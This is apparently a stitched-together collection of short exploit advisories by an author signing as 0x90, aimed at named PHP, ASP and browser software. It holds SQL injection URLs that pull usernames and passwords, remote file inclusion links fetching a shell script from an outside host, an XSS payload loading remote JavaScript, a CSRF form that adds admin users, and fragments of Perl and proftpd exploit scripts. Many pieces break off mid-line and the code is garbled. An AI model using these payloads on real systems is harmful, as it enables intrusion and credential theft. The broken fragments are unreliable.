[~] RPG.Board = 0.0.8Beta2 Remote SQL Injection
[~] Author: 0x90
[~] HomePage: www.0x90.com.ar
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] Script: RPG.Board
[~] site: http://rpgmaster.de/viewtopic.php?f=25t=69
[~] Vulnerability Class: SQL Injection
[~] Exploit
SQL Injection
[~] Author: 0x90
[~] HomePage: www.0x90.com.ar
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] Script: MapCal - The Mapping Calendar
[~] site: http://mapcal.sourceforge.net
[~] Vulnerability Class: SQL Injection
[~] Exploit:
http://localhost/cms/index.php
MyFWB 1.0 Remote SQL Injection
Author: 0x90
url: www.0x90.com.ar
Product: MyFWB
download: http://myfwb.co.cc/downloads/myfwb_1.0_FS_edition.zip
Version: 1.0
URL: http://www.fsoft.co.nr/
Vulnerability Class: SQL Injection
contact: Guns[at]0x90[dot]com[dot]ar
Username:
http://host/MyFWB/?page
!--
- Product : Avant Browser
-
- Version : 11.7 Build 9
-
- Author : 0x90
-
- Homepage: WwW.0x90.CoM.Ar
-
- Contact : Guns[at]0x90[dot]com[dot]ar
--
script
var s=String.fromCharCode(257);
var a=; var b=;
for(i=0;i1024;i++){a=a+s;}
for(i=0;i1024;i++){b=b+a;}
var ov=s;
for(i=0;i28
Inclusion Vulnerabilities
[~] Download: http://downloads.coronamatrix.org/phpAddressBookv2.11.zip
[~] Founder: 0x90
[~] HomePage: www.0x90.com.ar
[~] Public: http://0x90.com.ar/Advisory/20080321.txt
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] PoC:
http://[host]/[path]/index.php?skin
#!/usr/bin/perl
#Product: PHP-Nuke Module Advertising
#BugFounder: 0x90
#HomePage: WwW.0x90.COM.Ar
#Problem: Blind SQL Injection
use strict;
use warnings;
use LWP;
use Time::HiRes;
use IO::Socket;
my $host = http://[url]/modules.php?name=Advertising;;
my $useragent =
#Author: 0x90
#HomePage: WwW.0x90.CoM.Ar
#Contact: Guns[at]0x90[dot]com[dot]ar
#Vendor: IDMOS v1.0 Alpha
#Download: http://ufpr.dl.sourceforge.net/sourceforge/idmos/idmos.zip
#PoC
http://[target]/administrator/admin.php?site_absolute_path=http://shell?
http://[target]/administrator
!--
- Author : 0x90
-
- Homepage: WwW.0x90.CoM.Ar
-
- Contact : Guns[at]0x90[dot]com[dot]ar
-
- Product : Php Nuke add-on MS TopSites
-
- Website : http://phpnuke.org/
-
- Download: http://www.weblord.it/downloads/nuke65/addons/MS_TopSites_ITA.zip
-
- Problem : Edit Exploit
!--
- Product : sBlog
-
- Version : 0.7.3 Beta
-
- Website : http://www.sblog.se
-
- Author : 0x90
-
- Homepage: WwW.0x90.CoM.Ar
-
- Contact : Guns[at]0x90[dot]com[dot]ar
-
- Problem : Cross Site Request Forgery Vulnerability
-
- Summary : sBlog has, by default, no CSRF
!--
- Product : AGTC-Membership system
- Version : 1.1a
- Website : http://www.agtc.co.uk
- Author : 0x90
- HomePage : WwW.0x90.CoM.Ar
- Contact : Guns[at]0x90[dot]com[dot]ar
- Problem : Admin Added Access.
--
form name=form1 method=post action=http://[target]/adduser.php;
h3 align
Micro Login System v1.0 (userpwd.txt) Password Disclosure Vulnerability
#Affected Software: Micro Login System v1.0
#Download: http://www.hotscripts.com/jump.php?listing_id=67504jump_type=1
#Bugfounder: 0x90
#Contact: Guns[at]0x90[dot]com[dot]ar
#homepage: WwW.0x90.CoM.Ar
#[+]Exploit: http
./modules/mod_swmenufree/styles.php); // -- RFI
preview.php:13: require_once($mosConfig_absolute_path
./modules/mod_swmenufree/functions.php); // -- RFI
#Expl0it:
http://www.site.com/components/com_swmenufree/preview.php?mosConfig_absolute_path=http://scriptkiddie.com/c99haxor.txt?
#Contact: Guns
# sBlog 0.7.3 Beta XSS Vulnerability
# Found by 0x90
# www.0x90.com.ar
# msn mail: [EMAIL PROTECTED]
# in blog
http://host/blog/search.php
# use
'//script src=http://yoursite.com/evil.js
# Welcome to the jungle!
# Angel LMS 7.1 Remote SQL Injection
# by Guns
#All User Accounts#
http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--
#Account Passwords#
http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password
#Critical Status:High
#Found By: 0x90
#Download:http://www.scriptdungeon.com/script.php?ScriptID=2844
#Greetz:all my friends
#confkey-Password
#confvalue-Username
#Table:config
#http://host.com/path/?mode=viewalbum=-1%20UNION%20SELECT%20confkey%20FROM%20config/*
#!/usr/bin/perl -w
# Local Exploit
#
# [ Exploitation condition ]
# - proftpd must be compiled with --enable-ctrls option
# - local user needs permission to connect through unix socket (from proftpd.conf)
#
# This one works for 2.6 exploitation against gcc 4.x
# Payload will bind /bin/sh